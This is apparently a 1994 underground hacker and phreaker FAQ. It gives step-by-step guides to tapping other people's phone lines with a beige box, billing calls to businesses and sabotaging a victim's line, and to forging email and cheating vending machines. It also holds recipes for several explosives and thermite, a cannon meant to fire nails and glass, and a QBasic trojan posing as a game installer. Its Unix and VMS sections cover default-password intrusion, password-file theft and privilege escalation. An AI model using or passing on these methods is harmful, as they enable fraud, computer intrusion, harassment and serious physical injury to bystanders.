COCOT? (from Faunus, Carsenio) If it doesn't say "______ Bell" on it, it's probably a COCOT. COCOT is a general term for Customer owned or "Bell-independent" phone companies. Sometimes they are more shabbily constructed than real fortress phones but others look about the same except for a lack of phone company logo. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ FOOLING COCOTS USING 800 NUMBERS? You call up an 800 number as any public phone HAS too let you dial 800 numbers for free. Then you let the person who answers the 800 number hang up on you, THEN you dial your number that you want to call free. OK MOST COCOTs disable the keypad on the phone so you CANT just dial the number, you have to use a pocket tone dialer to dial the number. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE A BEIGE BOX? (from Neurophyre) Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator clips, ratchet wrench, 7/16-inch hex head 1. Cut the head off one end of the phone cord. 2. Strip the coating back about two (2) inches. 3. Look for the red wire, and the green wire. 4. Mark one clip green and put it on the green. 5. Mark the other red and put it on the red. 6. Once you have them soldered and insulated, plug the other end (that still has the head) into a phone. 7. Go out in the daytime and look for green bases, green rectangular things sticking about 3 feet out of the ground with a Bell logo on the front. If you're a lamer, you'll waste your time with a cable company box or something. I've heard of it. 8. Come back to a secluded one at night. With the wrench, open it up. 9. Find a set of terminals (look like the threaded end of bolts in my area) with what should be a red wire and a green wire coming off them. 10. Plug in your beige box red to red and green to green, pick up the phone and dial away! Modems work too as well as taps and shit. You're using someone else's line (unless you're an idiot) to get phone service. Don't abuse the same line after the phone bill comes. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ BEIGE BOXING 101 Field Phreaking by Revolution At the beginning of the section in the Bell training manual entitled "One million ways to catch and fry a phreak" it doesn't have a disclaimer saying "for informational purposes only". So why the hell should I put one here? Give this file to whoever you want, just make sure it all stays together, same title, same byline. Field phreaking gives you everything you've ever wanted: free long distance calls, free teleconferencing, hi-tech revenge, anything you can do from your own phone line and more, without paying for it, or being afraid of being traced. Just be ready to bail if you see sirens. How to make a beige box: Easiest box to make. Cut your phone cord before the jack, strip the wires a little. You should see a red (ring) wire and a green (tip) wire. If you see yellow and black wires too just ignore them. Put one set of alligator clips on the red wire and one on the green wire, and you're set. (You want to use your laptop computer, but you don't want to ruin your modem's phone cord? Just unscrew a jack from a wall, unscrew the 4 screws on the back, and do the same thing as above. Now you can use a phone, laptop, anything you can plug in a jack.) How to use: What you have is a lineman's handset. You can use it from any bell switching apparatus (from now on sw. ap.). These are on phone poles, where your phone line meets your house, and near payphones. I'll go into detail below, but basically just open any box on a telephone pole, and you'll see sets of terminals (screws), with wires wrapped around them, just like on the back of a phone jack. These screws are where you need to attach your alligator clips to get a dial tone. Don't unscrew the screw, you'll just fuck up some poor guys line, and increase your chances of getting caught. After the wire goes around the screw, it normally twists off into the air. Put your clip on the end of the wire. Do the same with the other clip. If you don't get a dial tone, then switch terminals. On telephone poles: TTI terminals: These must have been built by phreaks, just for beige boxing. By far the easiest sw. ap. use. The only drawback is that they only connect to one phone line. These are the fist sized gray or black boxes that appear where a single phone line meets the mother line. They look almost like outdoor electric sockets, that have the snap up covering. They normally have the letters TTI somewhere on the front. No bolts or screws to take off, just snap up the top and you will see four screws. Clip in and happy phreaking. Just click the top down and no one will ever know you were there (except for the extra digits on their phone bill.) Green trees: just about the hardest sw. ap. to beige from (tied with the bell canister) but if its the only one you can use, go for it. These are the 3 foot high green/gray metal columns that are no wider than a telephone pole (which makes them different then the green bases, see below), that say "Call before digging, underground cable," or the real old ones just have a bell sign. Usually green trees are right at the base of phone poles, or within a foot or two of them. These normally have two 7/16 bolts on one side of the column, which have to be turned 1/8 a turn counterclockwise, and the front of the base will slide off. Now you will see a sheet of metal with a few square holes in it, that has a bolt where the doorknob on a door would be. Ratchet this one off and the metal sheet will swing open like a door. On one side of the sheet will be a paper with a list of #'s this tree connects to. Inside you'll see a mass of wires flowing from gray stalks of plastic in sets of two. The whole mass will have a black garbage bag around it, or some type of covering, but that shouldn't get in the way. The wires come off the gray stalk, and then attach to the screws that you can beige from, somewhere near the ground at the center of the tree. These are on a little metal column, and sometimes are in a zig-zag pattern, so its hard to find the terminals that match in the right order to give you a dial tone. Green bases: The gray/green boxes you see that look just like green trees, except they are about twice or three times as wide. They open the same as trees, except there are always 4 bolts, and when the half slides off, inside is a big metal canister held together with like 20 bolts. I wouldn't open it, but with a little info from friends and some social engineering, I learned that inside is where two underground phone lines are spliced together. Also inside is either pressurized gas or gel. Pretty messy. Bell canisters: attached to phone poles at waist level. They are green (or really rusted brown) canisters about a two feet tall that have a bell insignia on the side. They will have one or two bolts at the very bottom of the canister, right above the base plate. Take the bolts off and twist the canister, and it'll slide right off. Inside is just like a green tree, except there normally isn't the list of #'s it connects to. Mother load: Largest sw. ap. A large gray green box, like 6 x 4, attached to a telephone pole about three feet off the ground. a big (foot or two diameter) cable should be coming out the top. Somewhere on it is a label "MIRROR IMAGE CABLE". It opens like a cabinet with double doors. Fasteners are located in the center of the box and on the upper edge in the center. Both of these are held on with a 7/16 bolt. Take the bolts off, and swing the doors open. On the inside of the right door are instructions to connect a line, and on the inside of the left door are a list of #'s the box connects to. And in the box are the terminals. Normally 1,000 phones (yyy-sxxx, where yyy is your exchange and s is the first number of the suffix, and xxx are the 999 phones the box connects too). On houses: follow the phone line to someone's house, and then down there wall. Either it goes right into there house (then you're screwed) or it ends in a plastic box. The newer boxes have a screw in the middle, which you can take off with your fingers, and then put the box back on when you're done, but the older ones are just plastic boxes you have to rip off. Inside are 4 terminals, yellow, black, and red and green, the two you need. Find the Christmas colors, and phreak out. On payphones: follow the phone line up from the phone, and sometimes you'll find a little black box with two screws in it. Undo this, and you'll find a nice little phone jack. You don't even need your beige box for that one. If there's not one of those, follow the wire to a wall it goes into, and sometimes there will be a sw. ap. like those on houses (see above). Payphones are normally pretty secure now though, and you probably won't find any of those. Phreaky things you can do: Jesus, do I have to tell you lamers everything? Anyway, free long distance calls should be pretty easy, and get teleconferencing info from somebody else, just make sure you ANI the # you're calling from before calling Alliance. Hi-tech revenge! Possibilities are endless, you have total control of this lamers line. Most of you guys are probably way to elite for this one, but you can disconnect his line by loosening a few screws and ripping his wires at any sw. ap. but here's something a lot better: Get the faggots number, and then find the mother load sw. ap. it connects to (not the sw. ap. on his house or on the telephone pole in his drive way, the _mother_load_) Find his # in the terminals, and then connect the two terminals with a paper clip or an alligator clip! His phone will be busy until ma bell figures out what the hell is going on, and since the last place they look is the mother load, this usually is at least a week. Then, of course, is the funniest prank: Beige box from a major store, like Toys R Us (that's my favorite) and call up ma bell "Yeah, I'd like all calls to this number forwarded to (his #)" That's it. Reach me as Revolution on ISCA, Cyberphunk on Shadow, phunk on IRC, or Revolution on Delphi. Any phreaks out there who got new info, war stories or some addictive disorder and just need somebody to talk to, E-mail revolution@delphi.com no PGP needed. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT PHONE NUMBER AM I CALLING FROM? (from Skipster, et al) This service is called ANI. This number may not work, but try it anyway: (800) 825-6060 You might want to try is dialing 311 ... a recorded message tells you your phone #. Experiment, but 311 does work, if it doesn't and an operator picks up, tell her that you were dialing information and your hand must have slipped. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I USE/DO ALLIANCE TELECONFERENCING? (from Neurophire, Carsenio) Set one of these up, it is a 1-800 dial-in conference. Then, grab your beige box, go to some business, preferably something like a Wal-Mart or a Radio Shack and beige box off their line. Then call and set up a teleconference for whenever to be billed to the line you are calling from. You'll want to know specifically what to ask for. Alliance teleconferencing is 0-700-456-1000. Dial the number (you're of course paying for this by the minute) and you get automated instructions on how to choose the number of ports for your conference call, and how to dial each participant.. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHERE CAN I FIND VOICE MAIL BOXES TO PHREAK? (from Token) Just scroll through your favorite business magazine and look for 800#s. Once you get a VMB system you can look for a box being used and try the default passcodes <0000> , <9999> , etc. Like on the
INet, most people are too dumb to change their passwd. If you’re
lucky you might get the root box (I did, the stupid ass’s passwd
was <4321>).

=====================================================================
II. Fake E-mail
(Fooling UUCP)

HOW DO I MAKE FAKE MAIL (OR HOW DO I FOOL UUCP)?
(from Beelzebub, Doktor Nil w/ Belisarius)

1. Telnet to port 25 of any internet server
(eg. telnet site.name.and.address 25)
2. If at all possible, AVOID TYPING “HELO”.
3. Type: rcpt to (person to receive fake mail){ENTER}
4. Type: mail from (fake name and address){ENTER}
5. The mail server should ok each time after each name.
6. If it does not:
a) type vrfy and then the name of the person
b) as a last resort use helo, this will login your computer as
having been the source of the mail
7. Retype the commands, it should say ok now.
8. Type: data{ENTER}
9. The first line of the message will be the Subject line
10. Enter your letter
11. To send letter type a “.” on an empty line.
12. Then type quit{ENTER}
13. This is traceable by any sysadmin … don’t harass people this
way.
14. If the person receiving the mail uses a shell like elm he/she
will not see the telltale fake message warning
“Apparently-To:(name)” even if not, most people wouldn’t know
what it means anyway.
15. Make sure you use a four part address somebody@part1.pt2.pt3.pt4
so as to make it look more believable and cover any add-ons the
mail routine might try
16. Put a realistic mail header in the mail message to throw people
off even more. If there are To: and Date: lines then the
program probably won’t add them on.
17. Also try to telnet to the site where the recipient has his
account. This works better if you know how to fool it.

=====================================================================
III. Social Engineering
(Free sodas, Dumpster Diving, ATMs, Carding)

WHAT DOES SALTING VENDING MACHINES DO?
When you take concentrated salt water (a high concentration of salt)
and squirt it into the change slot (preferably where the dollar
bills come in, though some say it doesn’t matter), the salt will
short circuit the machine and out will pour change and hopefully
sodas.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ANOTHER WAY OF GETTING FREE SODAS?
This is an easier and actually more reliable way of getting free
sodas. It only wprks pn spme machines though, usually Coca-Cola.
Anyways, put in your change and as the last coin goes down the slot
start rapidly and repeatedly pressing the button of your choice.
If everything works well, then you should get two sodas and your
change back.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW ARE THE TRACKS OF ATM CARD ARRANGED?

The physical layout of the cards are standard. The logical arrangement
of the data stored on the magnetic strip varies from institution to
institution. There are some generally followed layouts, but not
mandatory.

There are actually up to three tracks on a card.

Track 1:
Designed for airline use. Contains name and possibly your account
number. This is the track that is used when the ATM greets you
by name. There is alot of variation in how things are ordered so
occasionally you get ‘Greetings Q. John Smith’ or
‘Greetings John Smith Q.’ rather than ‘Greetings John Q. Smith’.
This track is also used
with the new airline auto check in (PSA, American, etc).

Track 2:
The main operational track for online use. The first thing
on the track is the Primary Account Number (PAN). This is usually
pretty standard for all cards. Some additional info might be on the
card such as expiration date.
One interesting item is the PIN (Personal Identification Number)
offset. When an ATM verifies a PIN locally, it usually uses an
encryption scheme involving the PAN and a secret KEY. This gives you
a “NATURAL PIN” (i.e. when they mail you your pin, this is how it got
generated). If you want to select your own PIN, they would put the
PIN OFFSET in the clear on the card. Just do modulo 10 arithmetic on
the Natural PIN plus the offset, and you have the selected PIN.
The PIN is never in the clear on your card. Knowing the PIN OFFSET
will not give you the PIN. This will require the SECRET KEY.

Track 3:
The “OFF-LINE” ATM track. It contains information such as your daily
limit, limit left, last access, account number, and expiration date.
The ATM itself could have the ability to write to this track to
update information.

=====================================================================
IV. The Big Bang
(Making Weapons and Explosives)

FLASH POWDERS:
(from Neurophyre)

Materials: Powdered magnesium, powdered potassium nitrate
1. Mix 1 part powdered magnesium and 4 parts of powdered potassium
nitrate.
2. Light it with a long fuse cuz its so bright it might screw up your
eyes.

REAL Cherry Bomb Powder
4 parts by weight of potassium perchlorate
1 part by weight of antimony trisulfide
1 part by weight aluminum powder

Relatively Safe
3 parts by weight of potassium permanganate
2 parts by weight of aluminum powder

*VERY* Shock/Friction/Static/Heat Sensitive!
Use only if suicidal or desperate!
4 parts by weight of potassium chlorate
1 part by weight of sulfur
1 part by weight of aluminum powder

1) To use these mixtures, SEPARATELY pulverize each ingredient into a
fine powder, the finer it is, the more power you get. Use a mortar and
pestle if available, and grind GENTLY. Do not use plastic as this can
build a static charge. Remember, do them SEPARATELY.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

AMATEUR EXPLOSIVE (Ammonium Triiodide):
(from IO)
WARNING: This explosive is EXTREMELY shock sensitive when dry, and
moderately sensitive when wet!!! AVOID IT when dry! DO NOT store!
The purplish iodine vapor this produces during the explosion will stain
and corrode!
1) Take a small plastic bucket, add 3-4 inches of household ammonia.
This bucket will never be clean again, in all likelihood.
Try to get clear (non-pine, non-cloudy) ammonia. Or use an
ammonium hydroxide solution from a chemlab. This results in better
but more sensitive, and therefore dangerous crystals.
2) Drop in iodine (like you use on scratches) one drop at a time, or,
preferably, use crystals of iodine.
3) Let it settle, then pour it through a piece of cloth, discarding
the runoff.
4) Squeeze *gently* to get out excess liquid.
5) Mold it onto the thing you want to blow up, stand **way** back.
6) Wait for it to dry, and throw a rock at it.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW TO BUILD A TENNIS BALL CANNON?
1. Get six (6) tin cans.
2. From five of them remove the tops and bottoms.
3. From the last one remove only the top. (this is the last can to
make the breach)
4. The cans should overlap and be fit together to make a long barrel
closed at one end and open at the other.

___________________________________
open –> ()____)_____)_____)_____)_____)_____) <--closed (barrel) 1 2 3 4 5 6 (breach) 5. Duct tape all of the cans together. USE LOTS OF TAPE!! 6. Put some gunpowder in the bottom of the CANnon. 7. Aim, brace the CANnon. 8. Spray hairspray or pour alcohol on the tennis ball and light. 9. Drop the ball into the can and STAND BACK! Other ideas: a) Make explosive tennis balls. b) Launch potatoes. c) Launch thumbtacks, nails, broken glass, etc. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW DO I MAKE GUNPOWDER(NITROCELLULOSE)? (from Terrorist's Handbook) Materials: cotton, concentrated nitric acid, concentrated sulfuric acid, distilled water Equipment: two(2) 200-300mL beakers, funnel, filter paper, blue litmus paper Procedure: 1. Pour 10mL of sulfuric acid into beaker. 2. Pour 10mL of nitric acid into beaker with sulfuric acid. 3. Immediately add 0.5 gram of cotton. 4. Allow it to soak for EXACTLY three(3) minutes. 5. Remove the nitrocellulose. 6. Put the nitrocellulose into a beaker of distilled water to wash it in. 7. Allow the material to dry. 8. Re-wash it. 9. Once neutral(acid/base) it can be dried and stored. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS THERMITE AND HOW DO I MAKE IT? Thermite is a powder which burns incredibly hot (approx. 2200 deg C) and can be used to burn through most anything. Materials: powdered aluminum, powdered iron oxide Procedure: mix the two powders together as evenly as possible Ignition: thermite is difficult to ignite but these work a) mix a small amount of potassium chlorate into the thermite mixture and ignite with a few drops of sulfuric acid b) magnesium strip or 'sparkler' stuck into the powder which is then lit as a fuse ===================================================================== V. Infection (Virii, Trojans, Worms and other creepy crawlies) WHERE CAN I GET SOME VIRII? The Virus eXchange BBS in Bulgaria. [number not available - 🙁 ] Problem: They demand a virus they don't have in their archives to let you in. Good luck finding one. The best way is to write one, even if it's in BASIC. It'll probably get you in. They have THOUSANDS of virii. IBM, Mac, Amiga, ... And they accept 2400 bps from what I know! For more info, gopher to wiretap.spies.com and dig around in their online library under technical info. There are alot of places in the US to get virii too: The Hell Pit in Chicago has over 1500, and they don't accept the lame stuff like the ones written in basic, so they're all good ones. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ INTS USED: (from Belisarius) You want Int 18h, AH=03h, Al==Num sectors to write BX==offset of pointer to buffer CH=cylinder Number Cl=sector number DX=head number Dl=drive numbers ES=segment of pointer with buffer for CH=it's the low 8 bits of 10 bit cylinder number, for CL=cylinder/sector number, bits 6,7=cylinder number(high 2 bits), 0-5=sector number. for DL=bit 7 = 0 for floppy, 1 for fixed drive upon return: AH=status, AL=number of sectors written flags, carry set if an error. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ SAMPLE OF A TROJAN (from Spear) This is a little trojan I wrote in Qbasic 4.5 It's a bitch! REM bitch by Spear color 14,0 print"installing datafiles... Please wait..." print"This may take up to 20 minutes, depending on your computer..." shell "cd\" for a = 1 to 100000 a$=str$(a) c$="md" + a$ + ".hee" shell c$ next a cls print"Cybermattixx Version 1.0 is now installed on your system..." print"Have a shitty day!" print " ?AM?" print input "Hit ENTER To REBOOT your System now!";a$ shell "boot.com" How to use it? This can pose as the installation program for a game. This means that when you upload it to a BBS or something, and post that it is a kickass game, people will download it and try to install it on their computers! What does it do? This program changes directory to the root and makes 100000 dirs in the root. You cannot use deltree to wipe them out in one chunk and you CANNOT get rid of them without doing reverse engineering on the program, ie. rd instead of md. To get rid of them any other way you would have to format c: or d: ** _____________ / / / *** *** ****** ****** / *** *** ********* ********* / / *** *** *** *** *** *** / / *********** *********** *** *** / /_____ ______ *********** *********** *** ** *** / / / /_____/ *** *** *** *** *** ***** / / / / *** *** *** *** *********** / / / /______ *** *** *** *** ***** *** +---------------+ | THE HAQ | | Edition 2.07 | | 11 JUN 1994 | +---------------+ File 2 of 3 ===================================================================== VI. NEWBIES READ THIS (Basic Hacking) WHAT MAKES A SYSTEM SECURE? (from alt.security FAQ) "The only system which is truly secure is one which is switched off and unplugged, locked in a titanium lined safe, buried in a concrete bunker, and is surrounded by nerve gas and very highly paid armed guards. Even then I wouldn't stake my life on it." - originally from Gene Spafford ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT WOULD BE IDEAL PROTECTION OF A SYSTEM? Password Access- Get rid of simple passwords; routinely change all passwords; regular review/monitoring of password files Physical Access- Lock up terminals, personal computers, disks when not in use; eliminate unnecessary access lines; disconnect modems when not in use Other measures- Know who you are talking to; shred all documents; avoid public domain software; report suspicious activity (especially non-working hours access) What this all means is that hackers must now rely on the ineptitude and laziness of the users of the system rather than the ignorance of SysOps. The SysOps and SecMans (Security Managers) are getting smarter and keeping up to date. Not only that, but they are monitoring the hack/phreak BBSes and publications. So the bottom line is reveal nothing to overinquisitive newbies...they may be working for the wrong side. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT IS A FIREWALL? (from the comp.security.misc FAQ) A (Internet) firewall is a machine which is attached (usually) between your site and a Wide Area Network (WAN). It provides controllable filtering of network traffic, allowing restricted access to certain Internet port numbers and blocks access to pretty well everything else. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW TO HACK WITHOUT GETTING INTO TROUBLE AND DAMAGING COMPUTERS? 1. Don't do damage intentionally. 2. Don't alter files other than than to hide your presence or to remove traces of your intrusion. 3. Don't leave any real name, handle, or phone number on any system. 4. Be careful who you share info with. 5. Don't leave your phone number with anyone you don't know. 6. Do NOT hack government computers. 7. Don't use codes unless you HAVE too. 8. Be paranoid! 9. Watch what you post on boards, be as general as possible. 10. Ask questions...but do it politely and don't expect to have everything handed to you. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ WHAT DO I DO IF I AM GETTING NOWHERE? 1. Change parity, data length, and stop bits. The system may not respond to 8N1 (most common setting) but may respond to 7E1,8E2, 7S2, etc. 2. Change baud rates. 3. Send a series of carriage returns. 4. Send a hard break followed by a carriage return. 5. Send control characters. Work from ^a to ^z. 6. Change terminal emulation. 7. Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, GO, LOGON, JOIN, HELP, or anything else you can think off. ===================================================================== VII. Screwing with the most widespread operating system on the net (UNIX / AIX Hacking) WHAT ARE COMMON DEFAULT ACCOUNTS ON UNIX? (from Belisarius) Common default accounts are root, admin, sysadmin, unix, uucp, rje, guest, demo, daemon, sysbin. These accounts may be unpassworded or the password may possibly be the same (i.e. username uucp has uucp as the passwd). ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HOW IS THE UNIX PASSWORD FILE SETUP? (from Belisarius) The password file is usually called /etc/passwd Each line of the passwd file of a UNIX system follows the following format: userid:password:userid#:groupid#:GECOS field:home dir:shell What each of these fields mean/do--- userid -=> the userid name, entered at login and is what the
login searches the file for. Can be a name or a
number.

password -=> the password is written here in encrypted form.
The encryption is one way only. When a login
occurs the password entered is run through the
encryption algorithm (along with a salt) and then
contrasted to the version in the passwd file that
exists for the login name entered. If they match,
then the login is allowed. If not, the password is
declared invalid.

userid# -=> a unique number assigned to each user, used for
permissions

groupid# -=> similar to userid#, but controls the group the user
belongs to. To see the names of various groups
check /etc/group

GECOS FIELD -=> this field is where information about the user is
stored. Usually in the format full name, office
number, phone number, home phone. Also a good
source of info to try and crack a password.

home dir -=> is the directory where the user goes into
the system at (and usually should be brought
to when a cd is done)

shell -=> this is the name of the shell which is
automatically started for the login

Note that all the fields are separated by colons in the passwd file.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file. You have
to find out what file, where it is and so on. Ask somebody on your
system about the specifics of the Yellow Pages system, but
discretely!

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc. Good for
looking for trojan horses like password stealing versions of
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the
owner.
A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):
1. Someone has a SUID program on their account, it happens to allow
a shell to, like @ or jump to a shell. If it does that, after you
execute said file and then spawn a shell off of it, all you do
in that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
writable, just write over it a script that spawns a shell, and you
got their privs again.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I HACK INTO AN AIX MACHINE?
(from Prometheus)

If you can get access to the ‘console’ AIX machines have a security
hole where you can kill the X server and get a shell with
ctrl-alt-bkspce. Also by starting an xterm up from one you are not
logged in the utmp for that session because the xterms don’t do utmp
logging as a default in AIX. Or try the usual UNIX tricks:
ftping /etc/passwd, tftping /etc/passwd, doing a finger and then
trying each of the usernames with that username as a password.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I INCREASE MY DISK QUOTA ON UNIX?
(from Prometheus)

A UNIX disk quota may be increased by finding a directory on another
partition and using that. Find another user who wants more quota and
create a directory for the other to use, one that is world writable.
Once they’ve put their subdirectory in it, change the perms on the
directory to only read-execute. The reason this works is that
usually accounts are distributed across a couple of filesystems, and
admins are usually too lazy to give users the same quotas on each
filesystem. If the users are all on one filesystem, you may be able
to snag some space from one of the /usr/spool directories by creating
a ‘hidden’ subdirectory like .debug there, and using that.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I FOOL AROUND ON XTERM / XWINDOWS?
(from Wildgoose)
Most x commands have a -display option which allows you to pick a
terminal to send to. So if you use bitmap to create a bitmap, or
download one, etc then:

xsetroot -bitmap bitmapname
[display the bitmap on your screen]

xsetroot -bitmap bitmapname -display xt2500:0
[display the bitmap on another xterm]

Other uses, try xterm -display xt??:0 will give someone else one of
your login windows to play with. They are then logged in as you
though, and can erase your filespace, etc. Beware!

Slightly irritating:
xclock -geom 1200×1200 -display xt??:0
[fills the entire screen with a clock]

Slightly more irritating:
Use a shell script with xsetroot to flash people’s screens different
colors.

On the nastier side:
Use a shell script with xsetroot to kill a person’s window manager.

Downright nasty:
Consult the man pages on xkill. It is possible to kill windows on
any display. So to log someone off an xterm you merely have to xkill
their login window.

Protect yourself:
If you use xhost – this will disable other people from being able
to log you out or generally access your terminal.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I TAKE ADVANTAGE OF THE DECODE DAEMON?
(from Caustic)
First, you need to make sure that the decode daemon is active.
Check this by telnetting to the smtp port (usually port 25), and
expanding user Decode. If it gives you something, you can use it.
If it tells you that the user doesn’t exist, or whatever, you can’t.

If the daemon is active, this is how to exploit the decode daemon:
1) uuencode an echo to .rhosts
2) pipe that into mail, to be sent to the decode daemon
(What happens: the decode daemon (1st) decodes the process, but
leaves the bin priveleges resident. (2nd) the echo command is
executed, because now the decoded message assumes the bin priveleges
[which are *still* active, even though the daemon didn’t issue the
command]).
3) If this is done right, you will be able to rlogin to the sysem.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I GET THE PASSWORD FILE IF IT IS SHADOWED?
(from Belisarius)
If your system has Yellow Pages file managment:

ypcat /etc/passwd > whatever.filename

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW IS A PASSWORD ENCRYPTED IN UNIX?
(from UNIX System Security[p.147])
Password encryption on UNIX is based on a modified version of
the DES [Data Encryption Standard]. Contrary to popular belief, the
typed password is not encrypted. Rather the password is used as the
key to encrypt a block of zero-valued bytes.
To begin the encryption, the first seven bits of each character
in the password are extracted to form the 56-bit key. This implies
that no more than eight characters are significant in a password.
Next, the E table is modified using the salt, which is the first two
characters of the encrypted password (stored in the passwd file).
The purpose of the salt is to makae it difficult to use hardware DES
chips or a precomputed list of encrypted passwords to attack the
algorithm. The DES algorithm (with the modified E table) is then
invoked for 25 iterations on the block of zeros. The output of this
encryption, which is 64 bits long, is then coerced into a
64-character alphabet (A-Z, a-z, 0-9, “.” and “/”). Because this
coersion involves translations in which several different values are
represented by the same character, password encryption is essentially
one-way; the result cannot be decrypted.

=====================================================================
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)

WHAT IS VAX/VMS?

VAX: Virtual Address eXtension. Computer is desisgned to use memory
addresses beyond the actual hardware and can therefore run progs
larger than physical memory. Developed by Digital Equipment
Corporation (DEC).

VMS: Virtual Memory System. Also developed by DEC.

DCL: Digital Command Language. Similar to DOS batch language or
UNIX script language.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE SOME OF THE DEFAULT VAX LOGINS?
Username Password
——– ——–
DECNET DECNET
DEFAULT DEFAULT
DEMO DEMO
unpassworded
FIELD FIELD
SERVICE
GUEST GUEST
unpassworded
OPERATOR OPERATOR
OPERATIONS OPERATIONS
SYSMAINT SYSMAINT
SERVICE
DIGITAL
SYSTEM SYSTEM
MANAGER
OPERATOR
SYSLIB
SYSTEST UETP
SYSTEST
SYSTEST_CLIG CLIG
SYSTEST
TEST
SUPPORT SUPPORT
DEC

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE SOME OF THE BASIC COMMANDS FROM THE “$” PROMPT?
@: executes a DCL program
usage- @filename.com
ACCOUNTING: program that tracks usage of the system by users
CREATE: PASCAL compiler
usage- CREATE filename.pas
CREATE/DIR: create a subdirectory
DEL: delete files
usage- DEL filename.ext
DIR: list the contents of a directory
options- /FULL = full listing with all security info
/BRIEF = brief listing
* = wildcard for anything
% = wildcard for a specific character
EDIT: VMS editor, requires VT-220 terminal
HELP: brings up help info
LOGOUT: obvious
MAIL: send E-mail locally and to any connected networks
$PASSWORD: change your password
usage- $PASSWORD newpassword
PHONE: chat program
usage- PHONE changes the prompt to a ‘%’, from there type in
the username you wish to talk to. If the user is on a
different node then enter nodename::username
PHOTO: record session
RUN: execute an executable file
SHOW: lets you look at alot of different stuff
usage- SHOW option
options- CLUSTER = VAX cluster, if any
DEFAULT = directory path and device
DEVICES = system devices (drives, modems, etc.)
INTRUSION = accounts being hacked, if any
MEMORY = obvious
NETWORK = network name and VAX’s location in it
PROCESS = PROCESS processname shows status
QUOTA = disk space available for account
SYSTEM = system info
DAY = obvious
TIME = obvious
USERS = online users
